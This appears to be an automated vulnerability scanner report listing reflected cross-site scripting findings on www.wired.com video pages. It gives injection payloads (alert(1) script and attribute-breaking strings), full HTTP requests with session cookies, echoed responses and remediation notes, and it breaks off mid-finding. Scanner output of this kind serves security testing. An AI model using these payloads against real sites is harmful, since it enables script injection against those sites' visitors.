HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:14 GMT Date: Mon, 22 Nov 2010 00:40:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4baf3"><a>7998fcdbb93 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d8699--><script>alert(1)</script>a361df0d06f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videod8699--><script>alert(1)</script>a361df0d06f/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29492 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:20 GMT Date: Mon, 22 Nov 2010 00:41:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videod8699--><script>alert(1)</script>a361df0d06f/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e455"-alert(1)-"6ef62eb7367 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos6e455"-alert(1)-"6ef62eb7367/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:47:27 GMT Date: Mon, 22 Nov 2010 00:42:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9840b"><a>577d7885e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos9840b"><a>577d7885e1b/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:45:59 GMT Date: Mon, 22 Nov 2010 00:41:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos9840b"><a>577d7885e1b c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30bb5"-alert(1)-"69a02b42d6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest30bb5"-alert(1)-"69a02b42d6f/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:48:44 GMT Date: Mon, 22 Nov 2010 00:43:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... /javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3d7"><a>5e95bf70531 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestec3d7"><a>5e95bf70531/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:46 GMT Date: Mon, 22 Nov 2010 00:42:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestec3d7"><a>5e95bf70531"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1898"-alert(1)-"2edd90105c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633d1898"-alert(1)-"2edd90105c3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:02 GMT Date: Mon, 22 Nov 2010 00:44:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... /javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 940f6"-alert(1)-"b91cf5f1eb9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows940f6"-alert(1)-"b91cf5f1eb9/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:48:59 GMT Date: Mon, 22 Nov 2010 00:44:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 878e5"-alert(1)-"ee44701c9fe was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001878e5"-alert(1)-"ee44701c9fe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:45 GMT Date: Mon, 22 Nov 2010 00:44:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33fc"><a>f604c53d836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videof33fc"><a>f604c53d836/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29445 Vary: Accept-Encoding Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:40:50 GMT Date: Mon, 22 Nov 2010 00:35:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videof33fc"><a>f604c53d836 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7521e--><script>alert(1)</script>c40066a1c9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video7521e--><script>alert(1)</script>c40066a1c9e/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29484 Vary: Accept-Encoding Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:41:24 GMT Date: Mon, 22 Nov 2010 00:36:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video7521e--><script>alert(1)</script>c40066a1c9e/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bcb"-alert(1)-"aa4a4cfdcc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos90bcb"-alert(1)-"aa4a4cfdcc3/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:39 GMT Date: Mon, 22 Nov 2010 00:37:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bdf6"><a>7f3d840db93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos2bdf6"><a>7f3d840db93/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos2bdf6"><a>7f3d840db93 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dacc"><a>bbb6c95b245 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest7dacc"><a>bbb6c95b245/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:41 GMT Date: Mon, 22 Nov 2010 00:37:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest7dacc"><a>bbb6c95b245"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c4ab"-alert(1)-"e3c870d3eb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest4c4ab"-alert(1)-"e3c870d3eb1/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:26 GMT Date: Mon, 22 Nov 2010 00:38:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e36"-alert(1)-"151a9a358c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663323e36"-alert(1)-"151a9a358c9/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:48 GMT Date: Mon, 22 Nov 2010 00:38:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afd86"-alert(1)-"f423dd03819 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40safd86"-alert(1)-"f423dd03819/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:17 GMT Date: Mon, 22 Nov 2010 00:39:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffd3d"-alert(1)-"0d025cc697d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
